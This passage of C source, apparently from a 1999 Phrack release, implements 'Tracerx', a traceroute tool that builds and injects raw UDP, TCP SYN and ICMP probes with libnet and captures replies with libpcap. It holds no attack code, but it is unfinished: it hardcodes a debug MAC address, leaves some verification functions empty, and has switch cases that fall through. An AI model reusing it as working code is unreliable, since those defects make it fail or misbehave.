+                    IP_H + ICMP_ECHO_H + TX_P);
+                (*tx_c)->packet_size = IP_H + ICMP_ECHO_H + TX_P;
+            }
+            if (tx_set_pcap_filter(TX_BPF_FILTER_ICMP, tx_c) == -1)
+            {
+                return (-1);
+            }
+            break;
+        default:
+            sprintf(err_buf, "Unknown protocol, can't set packetsize or filter\n");
+            return (-1);
+    }
+
+    /*
+     *  Allocate packet header memory.
+     */
+    if (libnet_init_packet(
+        (*tx_c)->packet_size + ETH_H,   /* include space for link layer */
+        &(*tx_c)->tx_packet) == -1)
+    {
+        sprintf(err_buf, "libnet_init_packet: %s\n", strerror(errno));
+        return (-1);
+    }
+    return (1);
+}
+
+
+int
+tx_do_scan(struct tx_control **tx_c)
+{
+    int i, j;
+
+    /*
+     *  Build a probe `template`.  This template will be used for each
+     *  probe sent and it will be updated each pass through the main loop.
+     */
+    tx_packet_build_probe(tx_c);
+
+    /*
+     *  Increment the hopcounter and update packet template.
+     */
+    for (i = 0; i < (*tx_c)->max_ttl; i++)
+    {
+        /*
+         *  Send a round of probes.
+         */
+        for (j = 0; j < (*tx_c)->probe_cnt; j++)
+        {
+            tx_packet_inject(tx_c);
+            fprintf(stderr, ".");
+        }
+        tx_packet_update_probe(tx_c);
+        fprintf(stderr, "\n");
+    }
+    tx_error(FATAL, "Hopcount exceeded.\n");
+    return (1);
+}
+
+
+int
+tx_shutdown(struct tx_control **tx_c)
+{
+    pcap_close((*tx_c)->p);
+    libnet_close_link_interface((*tx_c)->l);
+    free((*tx_c)->l);
+    libnet_destroy_packet(&(*tx_c)->tx_packet);
+
+    free(*tx_c);
+}
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_build.c !3b3527d5
+/*
+ *  $Id: tx_packet_build.c,v 1.3 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  tx_packet_build.c - tracerx packet construction routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_main.h"
+#include "./tx_error.h"
+#include "./tx_struct.h"
+#include "./tx_framework.h"
+#include "./tx_packet_inject.h"
+#include "./tx_packet_capture.h"
+
+int
+tx_packet_build_probe(struct tx_control **tx_c)
+{
+    int i, c;
+    u_char errbuf[BUFSIZ];
+    struct ether_addr *local_mac, *remote_mac;
+    u_char DEBUG_ETHER[6] = {0x00, 0x10, 0x4b, 0x6b, 0x3c, 0x16};
+
+    /*
+     *  Get the link layer addresses we'll need -- the local address of the
+     *  outgoing interface and remote address of the host in question (this
+     *  will actually be the first hop router).
+     */
+    c = tx_get_hwaddrs(&local_mac, &remote_mac, tx_c, errbuf);
+    if (c == -1)
+    {
+        tx_error(FATAL, "tx_get_hwaddrs could not get an address %s.\n",
+            errbuf);
+    }
+
+    /*
+     *  Build the ethernet header portion of the packet.
+     */
+    libnet_build_ethernet(DEBUG_ETHER/*remote_mac.ether_addr_octet*/,
+            local_mac->ether_addr_octet,
+            ETHERTYPE_IP,                           /* This is an IP packet */
+            NULL,                                   /* No payload */
+            0,                                      /* No payload */
+            (*tx_c)->tx_packet);                    /* packet memory */
+
+    /*
+     *  Build the IP header portion of the packet.
+     */
+    libnet_build_ip((*tx_c)->packet_size - IP_H,    /* IP packetlength */
+            (*tx_c)->ip_tos,                        /* IP type of service */
+            (*tx_c)->id,                            /* IP id */
+            (*tx_c)->ip_df,                         /* IP fragmentation bits */
+            (*tx_c)->current_ttl,                   /* IP time to live */
+            (*tx_c)->protocol,                      /* transport protocol */
+            (*tx_c)->sin.sin_addr.s_addr,           /* source IP address */
+            (*tx_c)->host,                          /* destination IP */
+            NULL,                                   /* IP payload */
+            0,                                      /* IP payload size */
+            (*tx_c)->tx_packet + ETH_H);            /* packet memory */
+
+    /*
+     *  Build the transport header and payload portion of the packet.
+     */
+    switch ((*tx_c)->protocol)
+    {
+        case IPPROTO_UDP:
+            tx_packet_build_udp(tx_c);
+            break;
+        case IPPROTO_TCP:
+            tx_packet_build_tcp(tx_c);
+            break;
+        case IPPROTO_ICMP:
+            tx_packet_build_icmp(tx_c);
+            break;
+        default:
+            tx_error(FATAL, "Unknown transport protocol\n");
+    }
+    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_IP, IP_H);
+}
+
+
+int
+tx_packet_build_udp(struct tx_control **tx_c)
+{
+    libnet_build_udp((*tx_c)->initial_sport,        /* source UDP port */
+            (*tx_c)->initial_dport,                 /* dest UDP port */
+            NULL,                                   /* payload (copied later) */
+            /* The UDP header needs to know the payload size. */
+            (*tx_c)->packet_size - IP_H - UDP_H,
+            (*tx_c)->tx_packet + ETH_H + IP_H);     /* packet memory */
+
+    tx_packet_build_payload(tx_c, UDP_H);
+
+    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_UDP,
+        (*tx_c)->packet_size - IP_H);
+}
+
+
+int
+tx_packet_build_tcp(struct tx_control **tx_c)
+{
+    libnet_build_tcp((*tx_c)->initial_sport,        /* source TCP port */
+            (*tx_c)->initial_dport,                 /* dest TCP port */
+            libnet_get_prand(PRu32),                /* sequence number */
+            0L,                                     /* ACK number */
+            TH_SYN,                                 /* control flags */
+            1024,                                   /* window size */
+            0,                                      /* urgent */
+            NULL,                                   /* payload (do this later) */
+            0,                                      /* later */
+            (*tx_c)->tx_packet + ETH_H + IP_H);     /* packet memory */
+
+    tx_packet_build_payload(tx_c, TCP_H);
+
+    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_TCP,
+        (*tx_c)->packet_size - IP_H);
+}
+
+
+int
+tx_packet_build_icmp(struct tx_control **tx_c)
+{
+    libnet_build_icmp_echo(ICMP_ECHO,
+            0,
+            0,
+            0,
+            NULL,
+            0,
+            (*tx_c)->tx_packet + ETH_H + IP_H);
+
+    tx_packet_build_payload(tx_c, ICMP_ECHO_H);
+
+    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_ICMP,
+        (*tx_c)->packet_size - IP_H);
+}
+
+
+int
+tx_packet_build_payload(struct tx_control **tx_c, int p_hdr_size)
+{
+    struct timeval time0;
+    struct tx_payload *p;
+    struct libnet_ip_hdr *ip_hdr;
+    int payload_offset;
+
+    /*
+     *  The payload is just beyond the transport header.
+     */
+    payload_offset = ETH_H + IP_H + p_hdr_size;
+
+    if (gettimeofday(&time0, NULL) == -1)
+    {
+        tx_error(FATAL, "Can't get timing information\n");
+    }
+
+    ip_hdr = (struct libnet_ip_hdr *)((*tx_c)->tx_packet + ETH_H);
+    p = (struct tx_payload *)((*tx_c)->tx_packet + payload_offset);
+
+    /*
+     *  This field is pretty much deprecated since we can keep track of
+     *  packets by controlling the ip_id field, something traceroute could
+     *  not do.
+     */
+    p->seq = 0;
+
+    /*
+     *  TTL packet left with.
+     */
+    p->ttl = ip_hdr->ip_ttl;
+
+    /*
+     *  RTT information.
+     */
+    p->tv = time0;
+}
+
+
+int
+tx_packet_update_probe(struct tx_control **tx_c)
+{
+    struct libnet_ip_hdr *ip_hdr;
+
+    ip_hdr = (struct libnet_ip_hdr *)((*tx_c)->tx_packet + ETH_H);
+
+    /*
+     *  Tracerx wouldn't be tracerx without a monotonically increasing IP
+     *  TTL.
+     */
+    ip_hdr->ip_ttl++;
+
+    switch ((*tx_c)->protocol)
+    {
+        case IPPROTO_TCP:
+        {
+            struct libnet_tcp_hdr *tcp_hdr;
+            tcp_hdr = (struct libnet_tcp_hdr *)((*tx_c)->tx_packet + ETH_H
+                    + IP_H);
+            if (!((*tx_c)->tx_flags & TX_STATIC_PORTS))
+            {
+                /*
+                 *  Increment destination port.
+                 */
+                tcp_hdr->th_dport = htons(ntohs(tcp_hdr->th_dport) + 1);
+            }
+            /*
+             *  Update the payload information.
+             */
+            tx_packet_build_payload(tx_c, TCP_H);
+            tcp_hdr->th_sum  = 0;
+            libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_TCP,
+                    (*tx_c)->packet_size - IP_H);
+            break;
+        }
+        case IPPROTO_UDP:
+        {
+            struct libnet_udp_hdr *udp_hdr;
+            udp_hdr = (struct libnet_udp_hdr *)((*tx_c)->tx_packet + ETH_H
+                    + IP_H);
+            if (!((*tx_c)->tx_flags & TX_STATIC_PORTS))
+            {
+                /*
+                 *  Increment destination port.
+                 */
+                udp_hdr->uh_dport = htons(ntohs(udp_hdr->uh_dport) + 1);
+            }
+            /*
+             *  Update the payload information.
+             */
+            tx_packet_build_payload(tx_c, UDP_H);
+            udp_hdr->uh_sum = 0;
+            libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_UDP,
+                    (*tx_c)->packet_size - IP_H);
+            break;
+        }
+        case IPPROTO_ICMP:
+        {
+            struct libnet_icmp_hdr *icmp_hdr;
+            icmp_hdr = (struct libnet_icmp_hdr *)((*tx_c)->tx_packet + ETH_H
+                    + IP_H);
+            /*
+             *  Update the payload information.
+             */
+            tx_packet_build_payload(tx_c, ICMP_ECHO_H);
+            icmp_hdr->icmp_sum = 0;
+            libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_ICMP,
+                    (*tx_c)->packet_size - IP_H);
+            break;
+        }
+        default:
+            tx_error(FATAL, "Unknown transport protocol\n");
+    }
+    ip_hdr->ip_sum = 0;
+    libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_IP, IP_H);
+}
+
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_inject.c !788114b0
+/*
+ *  $Id: tx_packet_inject.c,v 1.3 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  tx_packet_inject.c - high-level packet injection routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_struct.h"
+#include "./tx_framework.h"
+#include "./tx_error.h"
+
+int
+tx_packet_inject(struct tx_control **tx_c)
+{
+    int n;
+
+    n = libnet_write_link_layer(
+        (*tx_c)->l,                     /* pointer to the link interface */
+        (*tx_c)->device,                /* the device to use */
+        (*tx_c)->tx_packet,             /* the packet to inject */
+        (*tx_c)->packet_size + ETH_H);  /* total packet size */
+
+    if (n != (*tx_c)->packet_size + ETH_H)
+    {
+        tx_error(CRITICAL, "Write error.  Only wrote %d bytes\n", n);
+    }
+}
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_verify.c !7f21675e
+/*
+ *  $Id$
+ *
+ *  Tracerx
+ *  tx_packet_verify.c - packet verification routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_struct.h"
+#include "./tx_framework.h"
+#include "./tx_error.h"
+#include "./tx_packet_capture.h"
+
+
+int
+tx_packet_verify_udp(char *packet, struct tx_control **tx_c)
+{
+    struct libnet_ip_hdr *ip_hdr;
+    struct libnet_icmp_hdr *icmp_hdr;
+
+    ip_hdr = (struct libnet_ip_hdr *)(packet + ETH_H);
+
+    /*
+     *  A UDP scan is only interested in ICMP packets (or possibly a UDP
+     *  packet -- terminal case only).
+     */
+    if (ip_hdr->ip_p != IPPROTO_ICMP && ip_hdr->ip_p != IPPROTO_UDP)
+    {
+        return (TX_PACKET_IS_BORING);
+    }
+
+    icmp_hdr = (struct libnet_icmp_hdr *)(packet + ETH_H + IP_H);
+
+    switch (icmp_hdr->icmp_type)
+    {
+        case ICMP_UNREACH:
+        {
+            struct libnet_ip_hdr *o_ip_hdr;
+
+            if (ip_hdr->ip_src.s_addr == (*tx_c)->host)
+            {
+                /*
+                 *  This is an unreachable packet from our destination host.
+                 *  This has to be the terminal packet.  The report module
+                 *  will need to know if it's a regular port unreachable
+                 *  message or perhaps some other type of unreachable..
+                 */
+                if (icmp_hdr->icmp_code == ICMP_UNREACH_PORT)
+                {
+                    return (TX_PACKET_IS_TERMINAL);
+                }
+                else
+                {
+                    return (TX_PACKET_IS_TERMINAL_EXOTIC);
+                }
+            }
+
+            /*
+             *  Point to the original IP header inside the ICMP message's
+             *  payload.
+             */
+            o_ip_hdr = (struct libnet_ip_hdr *)(packet + ETH_H + IP_H +
+                    ICMP_UNREACH_H);
+
+            if (ntohs(o_ip_hdr->ip_id) == (*tx_c)->id &&
+                    o_ip_hdr->ip_src.s_addr ==
+                    (*tx_c)->sin.sin_addr.s_addr)
+            {
+                /*
+                 *  The original IP header was sent by this host and contains
+                 *  our special ID field, so it's almost positively ours.
+                 */
+                return (TX_PACKET_IS_UNREACH_EN_ROUTE);
+            }
+            else
+            {
+                return (TX_PACKET_IS_BORING);
+            }
+            break;
+        }
+        case ICMP_TIMXCEED:
+
+            break;
+        default:
+            return (TX_PACKET_IS_BORING);
+    }
+}
+
+
+int
+tx_packet_verify_tcp(char *packet, struct tx_control **tx_c)
+{
+}
+
+
+int
+tx_packet_verify_icmp(char *packet, struct tx_control **tx_c)
+{
+}
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_filter.c !df1a0488
+/*
+ *  $Id: tx_packet_filter.c,v 1.1 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  tx_packet_filter.c - packet filtering routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_struct.h"
+#include "./tx_error.h"
+#include "./tx_main.h"
+#include "./tx_packet_filter.h"
+
+
+int
+tx_set_pcap_filter(char *filter, struct tx_control **tx_c)
+{
+    struct bpf_program filter_code;
+    bpf_u_int32 local_net, netmask;
+    char err_buf[BUFSIZ];
+
+    /*
+     *  We need the subnet mask to apply a filter.
+     */
+    if (pcap_lookupnet((*tx_c)->device, &local_net, &netmask, err_buf) == -1)
+    {
+        tx_error(CRITICAL, "pcap_lookupnet: ", err_buf);
+        return (-1);
+    } 
+
+    /*
+     *  Compile the filter into bpf machine code.
+     */
+    if (pcap_compile((*tx_c)->p, &filter_code, filter, 1, netmask) == -1)
+    {
+        tx_error(CRITICAL, "pcap_compile failed for some reason\n");
+        sprintf(err_buf, "unknown error\n");
+        return (-1);
+    }
+
+    /*
+     *  Compile the filter into bpf machine code.
+     */
+    if (pcap_setfilter((*tx_c)->p, &filter_code) == -1)
+    {
+        tx_error(CRITICAL, "pcap_setfilter: ", err_buf);
+        return (-1);
+    }
+    return (1);
+}
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_packet_capture.c !27092cf6
+/*
+ *  $Id: tx_packet_capture.c,v 1.2 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  tx_packet_capture.c - high-level packet capturing routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_struct.h"
+#include "./tx_framework.h"
+#include "./tx_error.h"
+#include "./tx_packet_capture.h"
+
+int
+tx_packet_snatcher(struct tx_control **tx_c)
+{
+    int n;
+    u_char *packet;
+    struct pcap_pkthdr pc_hdr;
+
+    /*
+     *  Temporary looping construct until parallel code is in place.
+     */
+    for (; packet = (u_char *)pcap_next((*tx_c)->p, &pc_hdr); )
+    {
+        /*
+         *  Submit packet for verification based on scan type.
+         */
+        switch ((*tx_c)->protocol)
+        {
+            case IPPROTO_UDP:
+                n = tx_packet_verify_udp(packet, tx_c);
+                break;
+            case IPPROTO_TCP:
+                n = tx_packet_verify_tcp(packet, tx_c);
+                break;
+            case IPPROTO_ICMP:
+                n = tx_packet_verify_icmp(packet, tx_c);
+                break;
+        }
+
+        /*
+         *  Process the response from the verifier.
+         */
+        switch (n)
+        {
+            case -1:
+                /* an error occured */
+            case TX_PACKET_IS_BORING:
+                /* not something we are not interested in */
+                break;
+            case TX_PACKET_IS_EXPIRED:
+                tx_report(TX_PACKET_IS_EXPIRED, packet, tx_c);
+                break;
+            case TX_PACKET_IS_TERMINAL:
+                tx_report(TX_PACKET_IS_TERMINAL, packet, tx_c);
+                break;
+            case TX_PACKET_IS_TERMINAL_EXOTIC:
+                tx_report(TX_PACKET_IS_TERMINAL_EXOTIC, packet, tx_c);
+                break;
+            case TX_PACKET_IS_UNREACH_EN_ROUTE:
+                tx_report(TX_PACKET_IS_UNREACH_EN_ROUTE, packet, tx_c);
+                break;
+            default:
+                break;
+        }
+    }
+}
+
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_main.c !831e8153
+/*
+ *  $Id: tx_main.c,v 1.3 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  tx_main.c - main control logic
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#if (HAVE_CONFIG_H)
+#include "./config.h"
+#endif
+#include "./tx_main.h"
+#include "./tx_util.h"
+#include "./version.h"
+#include "./tx_struct.h"
+#include "./tx_error.h"
+#include "./tx_framework.h"
+
+int
+main(int argc, char *argv[])
+{
+    int c,
+        have_protocol;          /* Mediates combined usage of -I and -P */
+    u_char err_buf[BUFSIZ];
+    struct tx_control *tx_c;
+
+    /*
+     *  Need to be root to open link layer devices.
+     */
+    if (geteuid() && getuid())
+    {
+        tx_error(FATAL, "Pony up the privledgez (UID or EIUD == 0).\n");
+    }
+
+    /*
+     *  Initialize control structure.  This structure is used by just about
+     *  every function in the program.
+     */
+    if (tx_init_control(&tx_c) == -1)
+    {
+        tx_error(FATAL, "tx_init_control %s\n", strerror(errno));
+    }
+
+    /*
+     *  Process commandline arguments.
+     */
+    have_protocol = 0;
+    while ((c = getopt(argc, argv, "dFHhInrvxf:g:i:m:P:p:q:Ss:t:w:Vv")) != EOF)
+    {
+        switch (c)
+        {
+            case 'b':
+                /* Select burst rate */
+                tx_c->burst_rate = tx_str2int(optarg, "burst rate", 1,
+                    BURST_RATE_MAX);
+            case 'D':
+                /* Set base TCP/UDP destination port number */
+                tx_c->initial_dport = tx_str2int(optarg, "initial dest port",
+                    1, PORT_MAX);
+                break;
+            case 'd':
+                /* Socket level debugging (SO_DEBUG) */
+                /* NOOP */
+                break;
+            case 'F':
+                /* Set IP_DF (don't fragment) bit */
+                tx_c->ip_df = IP_DF;
+                break;
+            case 'f':
+                /* Set initial (first) IP TTL */
+                tx_c->current_ttl = tx_str2int(optarg, "initial TTL", 1,
+                    IP_TTL_MAX);
+                break;
+            case 'g':
+                /* Loose source routing */
+                /* NOOP */
+                break;
+            case 'H':
+                /* Verbose help */
+                /* WRITEME */
+            case 'h':
+                /* Help */
+                usage(argv[0]);                
+            case 'I':
+                /* Use ICMP */
+                /* Set transport protocol and transport header size */
+                /* Overruled by -P */
+                if (!have_protocol)
+                {
+                    tx_c->protocol = tx_prot_select("ICMP", &tx_c);
+                }
+                break;
+            case 'i':
+                /* Interface */
+                tx_c->device = optarg;
+                break;
+            case 'm':
+                /* Max IP TTL */
+                tx_c->max_ttl = tx_str2int(optarg, "max TTL", 1,
+                    IP_TTL_MAX);
+                break;
+            case 'n':
+                /* Do not resolve hostnames */
+                tx_c->use_name = 0;
+                break;
+            case 'P':
+                /* Set transport protocol and transport header size */
+                /* (supercedes -I) */
+                tx_c->protocol = tx_prot_select(optarg, &tx_c);
+                have_protocol = 1;
+                break;
+            case 'p':
+                /* Set base TCP/UDP destination port number */
+                tx_c->initial_dport = tx_str2int(optarg, "initial dest port",
+                    1, PORT_MAX);
+                break;
+            case 'q':
+                /* Number of probes (queries) */
+                tx_c->probe_cnt = tx_str2int(optarg, "probe cnt", 1, 
+                    PROBE_MAX);
+                break;
+            case 'r':
+                /* Bypass routing sockets */
+                /* NOOP */
+                break;
+            case 'S':
+                /* Do not increment TCP/UDP port numbers (static) */
+                tx_c->tx_flags |= TX_STATIC_PORTS;
+                break;
+            case 's':
+                /* Set base TCP/UDP source port number */
+                tx_c->initial_sport = tx_str2int(optarg, "initial source port",
+                    1, PORT_MAX);
+                break;
+            case 't':
+                /* Set IP_TOS (type of service) bits */
+                tx_c->ip_tos = tx_str2int(optarg, "IP tos", 0, 255);
+                break;
+            case 'V':
+                /* Version information */
+                fprintf(stderr, "\n%s\nversion %s\n", BANNER, version);
+                exit(EXIT_SUCCESS);
+            case 'v':
+                /* Verbose output */
+                tx_c->verbose = 1;
+                break;
+            case 'x':
+                /* Toggle checksums */
+                /* NOOP */
+                break;
+            case 'w':
+                /* Time to wait (in seconds) */
+                tx_c->reading_wait = tx_str2int(optarg, "read wait", 2, 
+                    WAIT_MAX);
+                break;
+            default:
